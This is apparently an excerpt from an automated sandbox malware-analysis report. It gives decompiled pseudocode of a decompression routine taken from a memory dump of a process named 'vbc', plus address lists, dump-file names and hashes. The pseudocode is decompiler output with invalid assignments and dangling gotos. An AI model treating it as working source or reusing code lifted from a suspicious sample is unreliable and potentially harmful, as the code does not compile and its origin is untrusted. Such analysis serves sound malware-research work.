											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406f10
0x00406f10
0x00406f14
0x00406f39
0x00406f43
0x00000000
0x00406f16
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f23
0x00406f27
0x00406f27
0x00406f2a
0x00407004
0x00407004
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00406fc2
0x00406fc2
0x00406fc2
0x0040675e
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x00000000
0x00406778
0x00000000
0x00000000
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f97
0x00406f9b
0x0040714a
0x00000000
0x0040714a
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00406fbc
0x00406fbc
0x00000000
0x00000000
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00000000
0x00406967
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x0040694a
0x00000000
0x0040692c
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00406943
0x00000000
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00000000
0x00000000
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00000000
0x00000000
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00000000
0x00406cb2
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406bd1
0x00406bd1
0x00406bd4
0x00406f46
0x00406f46
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00000000
0x00406ffd
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00000000
0x00000000
0x004070be
0x004070c1
0x00406fc2
0x00406fc2
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00000000
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x00406f09
0x0040713e
0x00407160
0x00407166
0x00407168
0x0040716f
0x00407171
0x00407178
0x0040717c
0x00000000
0x0040676d
0x00407175
0x00407175
0x00000000
0x00407175
0x00406fc2
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x0040709f
0x00000000
0x00406f14

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
Instruction ID: 6aec0e073e41beee5660f1704474c6018554c7323141eb4488ca3ed34e09e74f
Opcode Fuzzy Hash: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
Instruction Fuzzy Hash: 71913271D04229CBDF28CFA8C854BADBBB1FF44305F14816AD856BB291C7786986CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406C26 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406C26() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
